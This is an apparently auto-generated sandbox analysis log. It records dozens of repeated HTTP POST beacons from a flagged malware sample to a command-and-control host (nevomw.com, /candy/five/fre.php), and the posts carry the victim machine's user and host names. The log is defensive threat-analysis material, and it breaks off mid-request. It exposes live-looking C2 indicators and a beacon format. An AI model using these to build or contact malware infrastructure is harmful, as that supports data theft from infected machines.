                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:55.981451988 CET | 175 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:56.053913116 CET | 175 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:56.194096088 CET | 176 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            31 | 192.168.2.6 | 49747 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:56.489115000 CET | 176 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:56.541968107 CET | 177 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:56.615647078 CET | 177 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            32 | 192.168.2.6 | 49748 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:56.856209993 CET | 178 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:56.909864902 CET | 178 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:56.986978054 CET | 178 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            33 | 192.168.2.6 | 49749 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:57.268927097 CET | 179 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:57.323098898 CET | 180 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:57.405086040 CET | 180 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            34 | 192.168.2.6 | 49750 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:57.744998932 CET | 181 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:57.804277897 CET | 181 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:57.883454084 CET | 181 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            35 | 192.168.2.6 | 49751 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:58.120465994 CET | 182 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:58.173096895 CET | 182 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:58.247212887 CET | 183 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            36 | 192.168.2.6 | 49752 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:58.573098898 CET | 184 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:58.625736952 CET | 184 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:58.705684900 CET | 184 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            37 | 192.168.2.6 | 49753 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:58.978022099 CET | 185 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:59.030513048 CET | 185 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:59.104919910 CET | 186 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            38 | 192.168.2.6 | 49754 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:59.378493071 CET | 187 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:59.431277037 CET | 187 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:59.505511999 CET | 187 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            39 | 192.168.2.6 | 49755 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:59.770770073 CET | 188 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:59.876540899 CET | 188 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:59.952721119 CET | 189 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            4 | 192.168.2.6 | 49716 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:43.223644972 CET | 63 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:43.279001951 CET | 63 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:43.354862928 CET | 63 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            40 | 192.168.2.6 | 49756 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:00.250977039 CET | 190 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:00.306401014 CET | 190 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:00.382494926 CET | 190 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            41 | 192.168.2.6 | 49757 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:00.644083023 CET | 191 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:00.696590900 CET | 191 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:00.769340038 CET | 192 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            42 | 192.168.2.6 | 49758 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:01.090385914 CET | 193 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:01.143268108 CET | 193 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:01.218769073 CET | 193 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            43 | 192.168.2.6 | 49759 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:01.537713051 CET | 194 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:01.590174913 CET | 194 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:01.667457104 CET | 195 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            44 | 192.168.2.6 | 49760 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:02.003036022 CET | 195 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:02.055839062 CET | 196 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:02.131956100 CET | 196 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            45 | 192.168.2.6 | 49761 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:02.371231079 CET | 197 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:02.431969881 CET | 197 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:02.505198956 CET | 198 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            46 | 192.168.2.6 | 49762 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:02.962532043 CET | 198 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:03.015748024 CET | 199 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:03.089901924 CET | 199 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            47 | 192.168.2.6 | 49763 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:03.392819881 CET | 200 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
